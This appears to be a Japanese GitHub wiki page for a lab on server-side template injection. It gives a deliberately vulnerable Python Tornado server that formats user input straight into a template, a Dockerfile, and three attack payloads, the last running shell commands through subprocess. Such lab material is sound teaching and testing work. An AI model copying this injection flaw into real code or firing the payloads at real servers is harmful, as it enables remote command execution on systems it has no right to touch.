SSTI python 04 - yujitounai/helloworld GitHub Wiki

サーバーサイドテンプレートインジェクション

脆弱なソースコード (python Tornado)

server.py

import tornado.ioloop
import tornado.web
import tornado.template


class MainHandler(tornado.web.RequestHandler):
    def get(self):
        self.write('<!DOCTYPE html><html><body>\
    <form action="/" method="post">\
      First name:<br>\
      <input type="text" name="name" value="">\
      <input type="submit" value="Submit">\
    </form><h2>Hello  </h2></body></html>')
    def post(self):
        person = ""
        person = self.get_body_argument("name",default="")
        t = tornado.template.Template('<!DOCTYPE html><html><body>\
    <form action="/" method="post">\
      First name:<br>\
      <input type="text" name="name" value="">\
      <input type="submit" value="Submit">\
    </form><h2>Hello %s! </h2></body></html>' % person)
        self.write(t.generate())

def make_app():
    return tornado.web.Application([
        (r"/", MainHandler),
    ])

if __name__ == "__main__":
    app = make_app()
    app.listen(5073, address='0.0.0.0')
    tornado.ioloop.IOLoop.current().start()

Dockerfile

FROM python:3
COPY src/ /home
RUN pip3 install flask
RUN pip3 install tornado
RUN pip3 install typing

攻撃する方法

{{7*7}}

{% import os %}

{{__import__("subprocess").check_output("ls")}}

⚠️ **GitHub.com Fallback** ⚠️